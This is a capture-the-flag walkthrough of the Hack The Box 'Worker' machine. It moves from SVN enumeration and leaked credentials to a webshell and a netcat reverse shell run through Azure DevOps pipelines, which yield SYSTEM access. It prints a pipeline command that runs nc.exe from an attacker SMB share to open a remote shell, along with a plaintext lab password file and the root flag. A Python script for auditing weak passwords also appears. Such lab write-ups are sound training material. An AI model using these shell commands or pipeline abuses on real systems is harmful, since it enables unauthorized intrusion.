As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of the nmap timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.067s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
# Nmap done at Sun Jul 3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203
Nmap scan report for worker.htb (10.10.10.203)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds
Port 80 (HTTP), which may host a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page.
As we saw in the nmap report, port 3690 is open, so we can enumerate the Subversion server. To list its contents, run the following command.
svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt
There is some content in it. Let's download the content of the Subversion server.
svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
If we look in our current directory, we'll see the dimension.worker.htb directory, and the moved.txt file. Let's take a look at that file.
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
Now that we know a few domain names, let's add them to the /etc/hosts file.
We can also view the commits that have been made.
svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
As we can see, all the commits have been made by the nathen user. Let's see the content of the r2 commit.
svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
Now we have the deploy.ps1 file. Let's take a look at it.
Now we have some credentials. Let's take a look at the dimension.worker.htb site, and see if there is any virtual hosting.
Not much going on. Let's take a look now at the devops.worker.htb site.
Let's try to log in with the found credentials.
And we get it.
Exploitation
Let's click on the SmartHotel360 project.
From the Repos section we can see all the subdomains of the worker.htb domain. The idea here is to upload a .aspx webshell, that you can download from here, to one of the subdomains sites, for example the alpha.worker.htb. To do it, select the alpha repository, and click on Upload file(s).
Then select the cmd.aspx file and click Commit.
But we get an error because we cannot change the master branch. So let's go back and create a new branch.
Let's call it webshell.
Then, upload the cmd.aspx webshell to the webshell branch.
Then, click on Create a pull request.
And click on Create.
Then, click on Approve.
Now, from the Pipelines section, let's run the Alpha-CI pipeline.
And select the webshell branch.
Finally, the cmd.aspx file is in the master branch, and we can access it from the browser.
http://alpha.worker.htb/cmd.aspx
Time to get a shell. First, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, let's start an SMB server serving the directory where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, if we execute the cmd.exe program with the following parameters on the webshell, we'll get a reverse shell as the iis apppool\defaultapppool user.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
iis apppool\defaultapppool
Privilege Escalation
Enumerating the system, we could guess that the user flag is inside the robisl home directory.
dir \users
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\users
2020-07-07 17:53 <DIR> .
2020-07-07 17:53 <DIR> ..
2020-03-28 15:59 <DIR> .NET v4.5
2020-03-28 15:59 <DIR> .NET v4.5 Classic
2020-08-18 00:33 <DIR> Administrator
2020-03-28 15:01 <DIR> Public
2020-07-22 01:11 <DIR> restorer
2020-07-08 19:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10,490,904,576 bytes free
At this point, something that we could do is enumerate the logical disks available on the system.
wmic logicaldisk get name
Name
C:
W:
There is the W: logical disk. Let's enumerate it.
dir W:
Volume in drive W is Work
Volume Serial Number is E82A-AEA8
Directory of W:\
2020-06-16 18:59 <DIR> agents
2020-03-28 15:57 <DIR> AzureDevOpsData
2020-04-03 11:31 <DIR> sites
2020-06-20 16:04 <DIR> svnrepos
0 File(s) 0 bytes
4 Dir(s) 18,768,314,368 bytes free
Inside the svnrepos directory, we could find the \svnrepos\www\conf\passwd file, which contains a lot of credentials, including the nathen and robisl users.
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
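A plaintext svnserve passwd file like this is exactly what a defender should be auditing before an attacker reads it. The script below is an added example, not part of the original writeup: it parses the [users] section of the svnserve passwd format shown above (the sample is a constructed subset of the entries) and reports accounts defined twice, short passwords and passwords shared between accounts; the MIN_LENGTH threshold is an assumption.

```python
from collections import Counter

# Constructed sample modelled on the svnserve passwd file shown above
# (a subset of the entries; the format is one "user = password" per line).
SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robish = onesare
robisl = wolves11
ronkay = onesare
rubkei = the
"""

MIN_LENGTH = 8  # assumption: minimum acceptable password length for this audit


def parse_users(text):
    """Return (user, password) pairs from the [users] section, in file order."""
    pairs, in_users = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_users = line == "[users]"
            continue
        if in_users and "=" in line:
            user, password = (s.strip() for s in line.split("=", 1))
            pairs.append((user, password))
    return pairs


def audit(text):
    """Flag credential-hygiene problems a reviewer of this file would want to see."""
    pairs = parse_users(text)
    users = Counter(u for u, _ in pairs)
    passwords = Counter(p for _, p in pairs)
    findings = []
    for user, password in pairs:
        if users[user] > 1:
            findings.append(f"{user}: account defined more than once")
        if len(password) < MIN_LENGTH:
            findings.append(f"{user}: password shorter than {MIN_LENGTH} characters")
        if passwords[password] > 1:
            findings.append(f"{user}: password shared with another account")
    return findings


if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_PASSWD)))
```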
We could try the credentials for the robisl user on the devops.worker.htb website.
Now we see the PartsUnlimited project.
This project only has one repository.
From Project settings > Security we can see that the robisl user is a member of the Build Administrators group, so we can create pipelines.
Let's go to the Pipelines section and create a new pipeline.
Then, select the Azure Repos Git option.
Then, select the PartsUnlimited project.
Now, select the Starter pipeline.
Then, we will configure the YAML file by changing the pool value to Setup, since that is the name of the agent pool.
And then we'll change the script value to a command which will send us a reverse shell.
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Setup'
steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'
- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
  displayName: 'Run a multi-line script'
Make sure the SMB server is still serving the directory where the nc.exe binary is. Then let's set another netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Then, click on Save and run, and select the Create a new branch for this commit and start a pull request option. Then click on Save and run.
Then, we'll have to wait for a bit, and we'll get a shell as the nt authority\system user. Then all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
type C:\users\administrator\desktop\root.txt
da8deb09764e1567ed487b8ba21c6703